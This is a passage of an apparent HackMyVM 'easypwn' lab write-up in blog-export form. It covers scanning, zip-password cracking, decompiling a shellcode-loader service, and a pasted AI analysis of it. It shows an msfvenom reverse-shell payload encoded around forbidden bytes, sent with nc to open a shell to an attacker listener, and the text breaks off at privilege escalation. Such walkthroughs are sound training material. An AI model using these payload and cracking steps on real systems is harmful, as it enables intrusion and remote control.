{"id":847,"date":"2025-06-10T18:50:52","date_gmt":"2025-06-10T10:50:52","guid":{"rendered":"http:\/\/162.14.82.114\/?p=847"},"modified":"2025-06-10T18:50:52","modified_gmt":"2025-06-10T10:50:52","slug":"hmv-_-easypwn","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/847\/06\/10\/2025\/","title":{"rendered":"hmv[-_-]easypwn"},"content":{"rendered":"<h1>easypwn<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849644.png\" alt=\"image-20250610085532920\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849646.png\" alt=\"image-20250610085654827\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nRustScan: allowing you to send UDP packets into the void 1200x faster than NMAP\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.102:22\nOpen 192.168.10.102:80\nOpen 192.168.10.102:6666\n\nPORT     STATE SERVICE REASON         VERSION\n22\/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKpc4iyFhIzxDvlJoPvgE9rRlFPOqHm4EkLgqXQkVf31csyjpvJgyZpTgr4gYV3oztsMmQbIj+nFGD+L5pQfaSXtAdxKpqt4D\/MnFqVKP6KKGFhATWMCDzGXRaXQyaF7dOq49vkIoptczAU2af2PfwycA3aaI\/lNPOYSHPRufkm102lE\/lHZzNbXh0yJJXy9RJaqELeAibmqdrHFNpXFT8qAvsQrz\/6IKJkia4JLdVbfeMdZBOQ9lIlQg+2VfKXp7pF7kGZKKttIThc8ROqlcOaxlmuC5oKEgFQP7obty1+6fx\/QIuNn3D05FeQMqbvJfFZF1dE2IH4WEbFWRGH6w1\n|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAYupwIuJVRtRMDrYZ6fR\/3p5E5vsqXADwGAoZ2RW5vKPxDV3j\/+QjGbnRDj1iD5\/iwZxxlUggSr5raZfzAHrZA=\n|   256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAOshh8VG4l9hWlVYWfAvLuWuwPEdiF8EXmm5BFib\/+q\n80\/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.59 ((Debian))\n|_http-title: Don&#039;t Hack Me\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-server-header: Apache\/2.4.59 (Debian)\n6666\/tcp open  irc?    syn-ack ttl 64\n|_irc-info: Unable to open connection\n| fingerprint-strings: \n|   Help, Socks4, Socks5: \n|     Hackers, get out of my machine\n|   beast2: \n|_    start: 11\n1 service unrecognized despite returning data. 
If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port6666-TCP:V=7.95%I=7%D=6\/9%Time=68478310%P=x86_64-pc-linux-gnu%r(Hel\nSF:p,3C,&quot;Hackers,\\x20get\\x20out\\x20of\\x20my\\x20machine\\n\\[\\*\\]\\x20\\xe7\\xad\nSF:\\x89\\xe5\\xbe\\x85\\xe5\\xae\\xa2\\xe6\\x88\\xb7\\xe7\\xab\\xaf\\xe8\\xbf\\x9e\\xe6\\x8\nSF:e\\xa5\\.\\.\\.\\n&quot;)%r(Socks5,3C,&quot;Hackers,\\x20get\\x20out\\x20of\\x20my\\x20mach\nSF:ine\\n\\[\\*\\]\\x20\\xe7\\xad\\x89\\xe5\\xbe\\x85\\xe5\\xae\\xa2\\xe6\\x88\\xb7\\xe7\\xab\nSF:\\xaf\\xe8\\xbf\\x9e\\xe6\\x8e\\xa5\\.\\.\\.\\n&quot;)%r(Socks4,3C,&quot;Hackers,\\x20get\\x20\nSF:out\\x20of\\x20my\\x20machine\\n\\[\\*\\]\\x20\\xe7\\xad\\x89\\xe5\\xbe\\x85\\xe5\\xae\\\nSF:xa2\\xe6\\x88\\xb7\\xe7\\xab\\xaf\\xe8\\xbf\\x9e\\xe6\\x8e\\xa5\\.\\.\\.\\n&quot;)%r(beast2,\nSF:1E,&quot;\\n\\[!\\]\\x20start:\\x2011\\xef\\xbc\\x8c\\xe6\\x9c\\x8d\\xe5\\x8a\\xa1\\xe7\\xbb\nSF:\\x88\\xe6\\xad\\xa2\\n&quot;);\nMAC Address: 08:00:27:6E:39:3C (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -x php html txt -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n\n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 2.11.0\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url     
       \u2502 http:\/\/192.168.10.102\/\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 All Status Codes!\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.11.0\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83d\udcb2  Extensions            \u2502 [php, html, txt]\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 4\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET       36l       77w      930c http:\/\/192.168.10.102\/\n200      GET       36l       77w      930c http:\/\/192.168.10.102\/index.html\n200      GET       17l       42w      383c http:\/\/192.168.10.102\/mysecret.txt\n[####################] - 2m    882184\/882184  0s      found:3       errors:4923   \n[####################] - 2m    882184\/882184  7429\/s  
http:\/\/192.168.10.102\/ <\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849647.png\" alt=\"image-20250610090156750\" \/><\/p>\n<h3>Information Gathering<\/h3>\n<p>Trying to collect the dictionary:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ curl -s http:\/\/192.168.10.102\/mysecret.txt\nGo to the most evil port.\nYou will get what you want.\nPlease be gentle with him, maybe he will be afraid.\nIn order to obtain its source code.\nPerhaps you will need the dictionary below.\n\n\u53bb\u90a3\u4e2a\u6700\u90aa\u6076\u7684\u7aef\u53e3\u3002\n\u4f60\u4f1a\u5f97\u5230\u4f60\u60f3\u8981\u7684\u3002\n\u8bf7\u5bf9\u4ed6\u6e29\u67d4\u4e00\u70b9\uff0c\u4e5f\u8bb8\u5b83\u4f1a\u5bb3\u6015\u3002\n\u4e3a\u4e86\u5f97\u5230\u5b83\u7684\u6e90\u7801\u3002\n\u4e5f\u8bb8\u4f60\u4f1a\u9700\u8981\u4e0b\u9762\u7684\u5b57\u5178\u3002\n\n\/YTlPX4d2UENbWnI.txt\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ curl -s 
http:\/\/192.168.10.102\/YTlPX4d2UENbWnI.txt\nta0\nlingmj\nbamuwe\ntodd\nll104567\nprimary\nlvzhouhang\nqiaojojo\nflower\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ curl -s http:\/\/192.168.10.102\/YTlPX4d2UENbWnI.txt &gt; dict\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ dirsearch -u http:\/\/$IP\/ -w dict 2&gt;\/dev\/null\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 9\n\nOutput File: \/home\/kali\/temp\/easypwn\/reports\/http_192.168.10.102\/__25-06-09_21-05-48.txt\n\nTarget: http:\/\/192.168.10.102\/\n\n[21:05:48] Starting: \n[21:05:49] 200 -  722KB - \/ll104567\n\nTask Completed\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ wget http:\/\/192.168.10.102\/ll104567\n--2025-06-09 21:06:23--  http:\/\/192.168.10.102\/ll104567\nConnecting to 192.168.10.102:80... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 739584 (722K)\nSaving to: \u2018ll104567\u2019\n\nll104567                                        100%[====================================================================================================&gt;] 722.25K  --.-KB\/s    in 0.03s\n\n2025-06-09 21:06:24 (25.1 MB\/s) - \u2018ll104567\u2019 saved [739584\/739584]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ ll\ntotal 732\n-rw-rw-r-- 1 kali kali     68 Jun  9 21:04 dict\n-rw-rw-r-- 1 kali kali 739584 Feb 24 08:14 ll104567\ndrwxrwxr-x 3 kali kali   4096 Jun  9 21:05 reports\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ file ll104567\nll104567: Zip archive data, at least v2.0 to extract, compression method=deflate\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ unzip ll104567\nArchive:  ll104567\n[ll104567] opt\/server password:    <\/code><\/pre>\n<p>It asks for a password... so let us try cracking it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ zip2john ll104567 &gt; hash\nver 2.0 efh 5455 efh 7875 ll104567\/opt\/server PKZIP Encr: TS_chk, cmplen=739398, decmplen=2120576, crc=1B8B19DF ts=4118 cs=4118 type=8\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (PKZIP [32\/64])\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\noooooo           (ll104567\/opt\/server)\n1g 0:00:00:00 DONE (2025-06-09 21:08) 5.000g\/s 20480p\/s 20480c\/s 20480C\/s 123456..oooooo\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed. 
\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ unzip ll104567\nArchive:  ll104567\n[ll104567] opt\/server password: \n  inflating: opt\/server\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ file opt\/server\nopt\/server: ELF 64-bit LSB executable, x86-64, version 1 (GNU\/Linux), statically linked, for GNU\/Linux 3.2.0, BuildID[sha1]=db87ec3af59f50fcd961031784692ff086072fd2, not stripped\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ checksec --file=opt\/server\nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE\nPartial RELRO   Canary found      NX disabled   No PIE          No RPATH   No RUNPATH   7096 Symbols      No    0               0               opt\/server<\/code><\/pre>\n<p>Here comes the first <code>pwn<\/code>. Load it into <code>ida<\/code> and take a look; I located some of the code:<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rdx\n  int result; \/\/ eax\n  __int64 v5; \/\/ rax\n  std::ostream *v6; \/\/ rax\n  __int64 v7; \/\/ rax\n  __int64 v8; \/\/ rax\n  size_t v9; \/\/ rax\n  unsigned __int64 v10; \/\/ rsi\n  __int64 v11; \/\/ rax\n  char buf[4108]; \/\/ [rsp+0h] [rbp-1070h]\n  int v13; \/\/ [rsp+100Ch] [rbp-64h]\n  __int16 v14; \/\/ [rsp+1010h] [rbp-60h]\n  char v15[6]; \/\/ [rsp+1012h] [rbp-5Eh]\n  void (*v16)(void); \/\/ [rsp+1028h] [rbp-48h]\n  char *v17; \/\/ [rsp+1030h] [rbp-40h]\n  char v18; \/\/ [rsp+103Fh] [rbp-31h]\n  const char *v19; \/\/ [rsp+1040h] [rbp-30h]\n  void *v20; \/\/ [rsp+1048h] [rbp-28h]\n  unsigned __int64 len; \/\/ [rsp+1050h] [rbp-20h]\n  unsigned int v22; \/\/ [rsp+1058h] [rbp-18h]\n  unsigned int fd; \/\/ [rsp+105Ch] [rbp-14h]\n  char *v24; \/\/ [rsp+1060h] [rbp-10h]\n  int i; \/\/ [rsp+1068h] 
[rbp-8h]\n  bool v26; \/\/ [rsp+106Fh] [rbp-1h]\n\n  ssignal(11LL, signal_handler, envp);\n  ssignal(13LL, signal_handler, v3);\n  v13 = 1;\n  fd = socket(2LL, 1LL, 0LL);\n  if ( fd == 0 )\n  {\n    perror(&amp;unk_53C02D, 1LL);\n    result = 1;\n  }\n  else if ( (unsigned int)setsockopt(fd, 1LL, 2LL, &amp;v13, 4LL) != 0 )\n  {\n    perror(&amp;unk_53C044, 1LL);\n    close(fd);\n    result = 1;\n  }\n  else\n  {\n    v14 = 2;\n    *(_DWORD *)&amp;v15[2] = 0;\n    *(_DWORD *)v15 = (unsigned __int16)ntohs(6666LL);\n    if ( (signed int)bind(fd, &amp;v14, 16LL) &gt;= 0 )\n    {\n      if ( (signed int)listen(fd, 5LL) &gt;= 0 )\n      {\n        v5 = std::operator&lt;&lt;&lt;std::char_traits&lt;char&gt;&gt;((std::ostream *)&amp;std::cout);\n        v6 = (std::ostream *)std::ostream::operator&lt;&lt;(v5, 6666LL);\n        v7 = std::operator&lt;&lt;&lt;std::char_traits&lt;char&gt;&gt;(v6);\n        std::ostream::operator&lt;&lt;(v7, std::endl&lt;char,std::char_traits&lt;char&gt;&gt;);\n        while ( 1 )\n        {\n          while ( 1 )\n          {\n            v8 = std::operator&lt;&lt;&lt;std::char_traits&lt;char&gt;&gt;((std::ostream *)&amp;std::cout);\n            std::ostream::operator&lt;&lt;(v8, std::endl&lt;char,std::char_traits&lt;char&gt;&gt;);\n            v22 = accept(fd, 0LL, 0LL);\n            if ( (v22 &amp; 0x80000000) == 0 )\n              break;\n            perror(&amp;unk_53C0C9, 0LL);\n          }\n          dup2(v22, 0LL);\n          dup2(v22, 1LL);\n          dup2(v22, 2LL);\n          close(v22);\n          len = read(0, buf, 0x1000uLL);\n          v26 = (signed __int64)len &gt; 0;\n          for ( i = 0; v26 == 1 &amp;&amp; (signed __int64)len &gt; i; ++i )\n          {\n            v20 = &amp;forbidden_bytes;\n            v24 = (char *)&amp;forbidden_bytes;\n            v19 = &quot;\\n[!] 
start: &quot;;\n            while ( 1 )\n            {\n              if ( v24 == v19 )\n                goto LABEL_20;\n              v18 = *v24;\n              if ( v18 == buf[i] )\n                break;\n              ++v24;\n            }\n            v26 = 0;\nLABEL_20:\n            if ( v26 != 1 )\n              break;\n          }\n          if ( v26 == 1 )\n          {\n            v10 = len;\n            v16 = (void (*)(void))mmap64(0LL, len, 7uLL, 0x22uLL, 0xFFFFFFFFuLL, 0LL);\n            if ( v16 == (void (*)(void))-1LL )\n            {\n              perror(&amp;unk_53C108, v10);\n              close(v22);\n            }\n            else\n            {\n              j_memcpy(v16, buf, len);\n              v16();\n              munmap(v16, len);\n              v11 = std::operator&lt;&lt;&lt;std::char_traits&lt;char&gt;&gt;((std::ostream *)&amp;std::cout);\n              std::ostream::operator&lt;&lt;(v11, std::endl&lt;char,std::char_traits&lt;char&gt;&gt;);\n            }\n          }\n          else\n          {\n            v17 = &quot;Hackers, get out of my machine\\n&quot;;\n            v9 = j_strlen_ifunc(&quot;Hackers, get out of my machine\\n&quot;, buf);\n            write(1u, v17, v9);\n            close(v22);\n          }\n        }\n      }\n      perror(&amp;unk_53C078, 5LL);\n      close(fd);\n      result = 1;\n    }\n    else\n    {\n      perror(&amp;unk_53C061, &amp;v14);\n      close(fd);\n      result = 1;\n    }\n  }\n  return 
result;\n}<\/code><\/pre>\n<p>Hand it to the <code>AI<\/code>; from what I can see, that is what the masters all seem to do....<\/p>\n<blockquote>\n<p>Based on analysis of the provided decompiled code, this program implements a <strong>shellcode execution server with basic security protections<\/strong>. Below is a breakdown of its core functionality and execution flow:<\/p>\n<hr \/>\n<h3>\ud83d\udd27 1. <strong>Initialization and Socket Setup<\/strong><\/h3>\n<ul>\n<li>\n<p><strong>Signal handling<\/strong>: registers signal handlers for <code>SIGSEGV<\/code> (11) and <code>SIGPIPE<\/code> (13) to catch invalid memory accesses and broken-pipe errors.<\/p>\n<\/li>\n<li>\n<p>Socket configuration:<\/p>\n<ul>\n<li>Creates a TCP socket (<code>socket(2, 1, 0)<\/code>) in the IPv4 address family (<code>AF_INET<\/code>).<\/li>\n<li>Sets the <code>SO_REUSEADDR<\/code> option (<code>setsockopt<\/code>) so the port can be reused.<\/li>\n<li>Binds port 6666 (<code>bind(fd, &amp;v14, 16)<\/code>), where <code>v14<\/code> holds the address family (<code>AF_INET=2<\/code>) and the port number (<code>htons(6666)<\/code>).<\/li>\n<li>Starts listening (<code>listen(fd, 5)<\/code>) with a backlog of 5.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<h3>\ud83d\udd04 2. <strong>Client Connection Handling Loop<\/strong><\/h3>\n<ol>\n<li>Accepting connections:\n<ul>\n<li>Receives a client connection via <code>accept()<\/code>, which returns a new socket descriptor (<code>v22<\/code>).<\/li>\n<li>On failure (e.g. a negative return value), prints an error and keeps waiting.<\/li>\n<\/ul>\n<\/li>\n<li>I\/O redirection:\n<ul>\n<li>Uses <code>dup2<\/code> to redirect the client socket onto standard input\/output\/error (0, 1, 2), so later operations read and write network data directly.<\/li>\n<li>Closes the original client socket (<code>close(v22)<\/code>).<\/li>\n<\/ul>\n<\/li>\n<li>Reading data:\n<ul>\n<li>Reads up to 4096 bytes from the client (<code>read(0, buf, 0x1000)<\/code>) into the buffer <code>buf<\/code>.<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<hr \/>\n<h3>\u26a0\ufe0f 3. <strong>Security Checks and Execution Control<\/strong><\/h3>\n<ul>\n<li>Dangerous character filtering:\n<ul>\n<li>Walks the buffer and checks whether it contains any of the banned characters in <code>forbidden_bytes<\/code> (such as the newline <code>\\n<\/code> or certain control characters).<\/li>\n<li>If a banned character is found, sets the flag <code>v26=0<\/code> and breaks out of the loop.<\/li>\n<\/ul>\n<\/li>\n<li>Dynamic code execution:\n<ul>\n<li>If the data passes the filter (<code>v26==1<\/code>):<\/li>\n<li>Allocates a readable, writable and executable memory region with <code>mmap<\/code> (<code>PROT_READ|WRITE|EXEC, MAP_ANONYMOUS|PRIVATE<\/code>).<\/li>\n<li>Copies the buffer into that memory (<code>memcpy<\/code>).<\/li>\n<li><strong>Executes the code in memory directly<\/strong> (<code>v16()<\/code>, i.e. the shellcode).<\/li>\n<li>Releases the memory after execution (<code>munmap<\/code>).<\/li>\n<li>If the data does not pass the filter:<\/li>\n<li>Returns the error message <code>&quot;Hackers, get out of my machine\\n&quot;<\/code>.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<h3>\ud83d\udce2 4. <strong>Output and Logging<\/strong><\/h3>\n<ul>\n<li>On startup, prints the listening port (<code>std::cout &lt;&lt; &quot;Listening on 6666&quot;<\/code>).<\/li>\n<li>After each client connection, prints a newline (<code>std::cout &lt;&lt; std::endl<\/code>), probably as a log separator.<\/li>\n<li>When the shellcode runs successfully, prints an empty line (<code>std::cout &lt;&lt; std::endl<\/code>).<\/li>\n<\/ul>\n<hr \/>\n<h3>\u26a0\ufe0f Security Risk Notes<\/h3>\n<ol>\n<li><strong>High-risk behaviour<\/strong>: directly executing code received over the network (shellcode) is extremely dangerous and can be used for remote code execution (RCE) attacks.<\/li>\n<li><strong>Limited filtering<\/strong>: protection relies only on a character blacklist (<code>forbidden_bytes<\/code>), which is easily bypassed (e.g. by encoding\/obfuscation or by instructions the list does not cover).<\/li>\n<li><strong>Unverified source<\/strong>: there is no client IP check or authentication, so the open port can be abused.<\/li>\n<\/ol>\n<hr \/>\n<h3>\ud83d\udccc Functional Summary<\/h3>\n<table>\n<thead>\n<tr>\n<th><strong>Stage<\/strong><\/th>\n<th><strong>Operation<\/strong><\/th>\n<th><strong>Key functions\/instructions<\/strong><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Initialization<\/td>\n<td>Signal handling, socket bound to port 6666<\/td>\n<td><code>ssignal<\/code>, <code>socket<\/code>, 
<code>bind<\/code><\/td>\n<\/tr>\n<tr>\n<td>Client connection<\/td>\n<td>Accept connection, I\/O redirection<\/td>\n<td><code>accept<\/code>, <code>dup2<\/code>, <code>close<\/code><\/td>\n<\/tr>\n<tr>\n<td>Data processing<\/td>\n<td>Read data and filter dangerous characters<\/td>\n<td><code>read<\/code>, character-by-character check<\/td>\n<\/tr>\n<tr>\n<td>Dynamic execution<\/td>\n<td>Map memory and execute the shellcode<\/td>\n<td><code>mmap<\/code>, <code>memcpy<\/code>, <code>v16()<\/code><\/td>\n<\/tr>\n<tr>\n<td>Result feedback<\/td>\n<td>Empty line on success \/ error message on failure<\/td>\n<td><code>std::cout<\/code>, <code>write<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<blockquote>\n<p>\ud83d\udca1 This program is essentially a <strong>simple shellcode loader<\/strong>, suited to penetration-testing or CTF scenarios; a real deployment would need a strict risk assessment. To analyse the filter rules (<code>forbidden_bytes<\/code>) further or improve the security design, verify the behaviour with a dynamic debugging tool such as GDB.<\/p>\n<\/blockquote>\n<\/blockquote>\n<p>As for the characters the code forbids, we can see:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849648.png\" alt=\"image-20250610101717509\" \/><\/p>\n<blockquote>\n<h3>\u26a0\ufe0f Forbidden Character List (hex values and meaning)<\/h3>\n<table>\n<thead>\n<tr>\n<th style=\"text-align: center;\">Hex value<\/th>\n<th style=\"text-align: center;\">ASCII character<\/th>\n<th style=\"text-align: center;\">Meaning \/ reason<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align: center;\"><code>0x00<\/code><\/td>\n<td style=\"text-align: center;\"><code>\\x00<\/code> (NULL)<\/td>\n<td style=\"text-align: center;\"><strong>Null byte<\/strong>: string terminator; can truncate data or end functions early (e.g. <code>strcpy<\/code>).<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>0x20<\/code><\/td>\n<td style=\"text-align: center;\">Space<\/td>\n<td style=\"text-align: center;\"><strong>Space character<\/strong>: may be restricted in certain input-filtering scenarios, but here it must be confirmed from context.<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>0x0F<\/code><\/td>\n<td style=\"text-align: center;\">SI (Shift In)<\/td>\n<td style=\"text-align: center;\"><strong>Control character<\/strong>: non-printable; may interfere with data processing.<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>0xCD<\/code><\/td>\n<td style=\"text-align: center;\"><code>\u00cd<\/code><\/td>\n<td style=\"text-align: center;\"><strong>Extended ASCII character<\/strong>: may be parsed as an unexpected value in certain encoding environments.<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>0x09<\/code><\/td>\n<td style=\"text-align: center;\"><code>\\t<\/code> (horizontal tab)<\/td>\n<td style=\"text-align: center;\"><strong>Whitespace<\/strong>: may be parsed as a delimiter, affecting data integrity.<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>0x22<\/code><\/td>\n<td style=\"text-align: center;\"><code>&quot;<\/code> (double quote)<\/td>\n<td style=\"text-align: center;\"><strong>Special symbol<\/strong>: may cause syntax errors or injection risks in command-line or string handling.<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align: center;\"><code>0x0A<\/code><\/td>\n<td style=\"text-align: center;\"><code>\\n<\/code> (newline)<\/td>\n<td style=\"text-align: center;\"><strong>Newline<\/strong>: a common input terminator; may end a read early (e.g. the <code>read<\/code> function).<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/blockquote>\n<h3>Generating the shellcode<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=192.168.10.106 LPORT=1234 -b &#039;\\x00\\x20\\x0f\\xcd\\x09\\x22\\x0a&#039; -f raw &gt; payload\n[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nFound 3 compatible encoders\nAttempting to encode payload with 1 iterations of x64\/xor\nx64\/xor succeeded with size 119 (iteration=0)\nx64\/xor chosen with final size 
119\nPayload size: 119 bytes<\/code><\/pre>\n<h3>Loading the shellcode<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/easypwn]\n\u2514\u2500$ nc $IP 6666 &lt; payload<\/code><\/pre>\n<p>And the shell popped on the other side...<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849649.png\" alt=\"image-20250610110132979\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Stabilizing the shell<\/h3>\n<p>sad.jpg: I switched to a new <code>kali<\/code>, and <code>pwncat-cs<\/code> no longer works:<\/p>\n<pre><code class=\"language-bash\">python3 -c &#039;import pty;pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nexport TERM=xterm\nCtrl + Z\nstty raw -echo; fg\nstty size\nstty rows 38 columns 116<\/code><\/pre>\n<p>I did not use the commands above; I chose to fix my <code>pwncat-cs<\/code> instead....<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849650.png\" alt=\"image-20250610113754830\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506101849651.png\" alt=\"image-20250610113809510\" \/><\/p>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) lamb@pwnding:\/home\/lamb$ ls -la\ntotal 28\ndrwxr-xr-x 2 lamb lamb 4096 Feb 24 07:52 .\ndrwxr-xr-x 3 root root 4096 Feb 19 20:34 ..\nlrwxrwxrwx 1 lamb lamb    9 Feb 19 09:27 .bash_history -&gt; 